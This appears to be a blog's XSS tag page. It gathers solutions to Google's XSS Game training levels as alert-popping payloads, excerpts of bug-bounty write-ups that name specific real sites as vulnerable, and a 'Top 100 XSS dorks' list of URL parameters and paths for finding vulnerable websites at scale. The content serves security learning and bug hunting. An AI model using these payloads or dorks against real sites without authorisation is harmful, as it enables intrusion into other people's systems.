In an ever-evolving digital landscape, web application security is paramount. Cross-Site Scripting, commonly known as XSS, remains one of the most prevalent and dangerous security vulnerabilities. In this blog post, we will delve into the different types of XSS, explore how it can be exploited, and learn how to detect and mitigate it, all while…
Tag: xss
Google XSS Game
Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page
Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML
Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss
Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
Testing for XSS (Cross Site Scripting)
Hi, So today ill tell some techniques of testing XSS, First of all these important things you should note: Copy pasting XSS payloads doesn’t work PoC or GTFO Its said like report checkers need a proper PoC for validation of the report, If doesn’t, Your report cannot be triaged. So first, For testing XSS you…
Easy XSS On Mostly Educational Websites Via Moodle
Many educational websites are using Moodle which is vulnerable to RXSS and according to shodan more than 50K websites are using this technology. Moodle is a learning platform designed to provide educators, administrators, and learners with a single robust, secure and integrated system to create personalized learning environments. This was founded by @PewGrand
How to find AngularJS XSS
Have you ever heard about publicwww? It’s a search engine for source code. So publicwww will fnd any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code. They have this list that you can search for: AdvertisingMarketingAnalyticsTechnologiesFrontendWidgetsCMS You can find it here https://publicwww.com. They also have plans and pricing if…
XSS Injection with SQLi
XSS Injection with SQLi (XSSQLi) XSS Injection with SQLi (XSSQLi) Well After our discussion on different types of injection and places you can find SQL injection Vulnerability, an attacker can successfully exploit and SQL injection vulnerability and get access over the database and if he is enough lucky to get access to the File System…
Using {XSS} to play games on Site
Hello guys, today I’m going to teach you how to play inside any website that has an XSS flaw.This technique is more aimed at making fun videos satirizing websites or even playing with your friends… The code is very simple because it only emblems the application of the game in question and an opening of…
JDECO.net XSS Vulnerability| CybeReports
The website of Jerusalem District Electricity Company (Arabic: شركة كهرباء محافظة القدس) this XSS sent to us by MD
Stored XSS on h2biz.net
I was surfing the internet when I came across this web portal http://www.h2biz.net which I found to be vulnerable to Reflected XSS. So I attempted to make a Stored XSS because I noticed a kind of message board. I have created a temporary email for registering on the website, then I completed the registration phase….
Top 100 XSS dorks
It’s the end of the year and a good time to share things with people.
After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.
It can be used as a powerful dork list so let’s update your scanners and get bounties!
First here is the list of most vulnerable parameters along with their frequency.
Dork | Frequency |
---|---|
q | 5.5% |
s | 4.5% |
search | 1.9% |
id | 1.7% |
lang | 1.4% |
keyword | 1.2% |
query | 1.1% |
page | 1.0% |
keywords | 0.8% |
year | 0.8% |
view | 0.8% |
0.8% | |
type | 0.7% |
name | 0.7% |
p | 0.7% |
month | 0.6% |
immagine | 0.6% |
list_type | 0.5% |
url | 0.5% |
terms | 0.5% |
categoryid | 0.5% |
key | 0.5% |
l | 0.5% |
begindate | 0.4% |
enddate | 0.4% |
categoryid2 | 0.4% |
t | 0.4% |
cat | 0.4% |
category | 0.4% |
action | 0.4% |
bukva | 0.4% |
redirect_uri | 0.4% |
firstname | 0.4% |
c | 0.4% |
lastname | 0.3% |
uid | 0.3% |
startTime | 0.3% |
eventSearch | 0.3% |
categoryids2 | 0.3% |
categoryids | 0.3% |
sort | 0.3% |
positiontitle | 0.3% |
groupid | 0.3% |
m | 0.3% |
message | 0.3% |
tag | 0.3% |
pn | 0.3% |
title | 0.3% |
orgId | 0.3% |
text | 0.3% |
handler | 0.2% |
myord | 0.2% |
myshownums | 0.2% |
id_site | 0.2% |
city | 0.2% |
search_query | 0.2% |
msg | 0.2% |
sortby | 0.2% |
produkti_po_cena | 0.2% |
produkti_po_ime | 0.2% |
mode | 0.2% |
CODE | 0.2% |
location | 0.2% |
v | 0.2% |
order | 0.2% |
n | 0.2% |
term | 0.2% |
start | 0.2% |
k | 0.2% |
redirect | 0.2% |
ref | 0.2% |
file | 0.2% |
mebel_id | 0.2% |
country | 0.2% |
from | 0.1% |
r | 0.1% |
f | 0.1% |
field%5B%5D | 0.1% |
searchScope | 0.1% |
state | 0.1% |
phone | 0.1% |
Itemid | 0.1% |
lng | 0.1% |
place | 0.1% |
bedrooms | 0.1% |
expand | 0.1% |
e | 0.1% |
price | 0.1% |
d | 0.1% |
path | 0.1% |
address | 0.1% |
day | 0.1% |
display | 0.1% |
a | 0.1% |
error | 0.1% |
form | 0.1% |
language | 0.1% |
mls | 0.1% |
kw | 0.1% |
u | 0.1% |
This second list is almost the same but with corresponding path :
Dork | Frequency |
---|---|
/?s= | 3.6 |
/search?q= | 2.5 |
/index.php?lang= | 0.6 |
/pplay/info_prenotazioni.asp?immagine= | 0.6 |
/shared/lgflsearch.php?terms= | 0.5 |
/index.php?page= | 0.4 |
/search?query= | 0.4 |
/en/Telefon-Cam?search= | 0.4 |
/index.php?bukva= | 0.4 |
/pro/events_print_setup.cfm?list_type= | 0.3 |
/pro/events_print_setup.cfm?categoryid= | 0.3 |
/pro/events_print_setup.cfm?categoryid2= | 0.3 |
/?eventSearch= | 0.3 |
/?startTime= | 0.3 |
/pro/events_ical.cfm?categoryids= | 0.3 |
/pro/events_ical.cfm?categoryids2= | 0.3 |
/pro/events_print_setup.cfm?month= | 0.3 |
/pro/events_print_setup.cfm?year= | 0.3 |
/pro/events_print_setup.cfm?begindate= | 0.3 |
/pro/events_print_setup.cfm?enddate= | 0.3 |
/search?keyword= | 0.3 |
/?q= | 0.3 |
/search/?q= | 0.3 |
/index.php?pn= | 0.3 |
/?lang= | 0.3 |
/property/search?uid= | 0.3 |
/index.php?id= | 0.3 |
/search?orgId= | 0.3 |
/products?handler= | 0.2 |
/pro/events_print_setup.cfm?view= | 0.2 |
/pro/events_print_setup.cfm?keywords= | 0.2 |
/?p= | 0.2 |
/search.php?q= | 0.2 |
/?search= | 0.2 |
/pro/minicalendar_detail.cfm?list_type= | 0.2 |
/index.php?produkti_po_cena= | 0.2 |
/index.php?produkti_po_ime= | 0.2 |
/servlet/com.jsbsoft.jtf.core.SG?CODE= | 0.2 |
/login?redirect_uri= | 0.2 |
/connexion?redirect_uri= | 0.2 |
/index.php?action= | 0.2 |
/plugins/actu/listing_actus-front.php?id_site= | 0.2 |
/index.php?mebel_id= | 0.2 |
/search/?search= | 0.2 |
/news/class/index.php?myshownums= | 0.2 |
/news/class/index.php?myord= | 0.2 |
/search.html?searchScope= | 0.1 |
/search?field%5B%5D= | 0.1 |
/videos?tag= | 0.1 |
/videos?place= | 0.1 |
/videos?search= | 0.1 |
/?email= | 0.1 |
/?cat= | 0.1 |
/content.php?expand= | 0.1 |
/?page= | 0.1 |
/search/?s= | 0.1 |
/?keywords= | 0.1 |
/search/?keyword= | 0.1 |
/apps/email/index.jsp?n= | 0.1 |
/?name= | 0.1 |
/?sort= | 0.1 |
/search?search= | 0.1 |
/pro/minicalendar_print_setup.cfm?begindate= | 0.1 |
/pro/minicalendar_print_setup.cfm?enddate= | 0.1 |
/pro/minicalendar_print_setup.cfm?keywords= | 0.1 |
/search-results?q= | 0.1 |
/?listingtypeid= | 0.1 |
/search?s= | 0.1 |
/pro/minicalendar_print_setup.cfm?categoryid2= | 0.1 |
/?bathrooms= | 0.1 |
/?listingagent= | 0.1 |
/?featuredsearchseourl= | 0.1 |
/?squarefeet= | 0.1 |
/?siteid= | 0.1 |
/?bedrooms= | 0.1 |
/?featuredsearch= | 0.1 |
/?price= | 0.1 |
/?maxbuilt= | 0.1 |
/?lsid= | 0.1 |
/?listingtypes= | 0.1 |
/?garages= | 0.1 |
/?maxprice= | 0.1 |
/?minprice= | 0.1 |
/?keywordsany= | 0.1 |
/?yearbuilt= | 0.1 |
/?minbuilt= | 0.1 |
/?subdivision= | 0.1 |
/?lotsizeval= | 0.1 |
/?listingstatusid= | 0.1 |
/?mls= | 0.1 |
/firms/?text= | 0.1 |
/servlet/com.jsbsoft.jtf.core.SG?OBJET= | 0.1 |
/plan_du_site.php?lang= | 0.1 |
/index.php?Itemid= | 0.1 |
/?view= | 0.1 |
/?t= | 0.1 |
/?selat= | 0.1 |
/?selong= | 0.1 |
/?nwlat= | 0.1 |
/?geo= | 0.1 |
I hope you enjoy this 🙂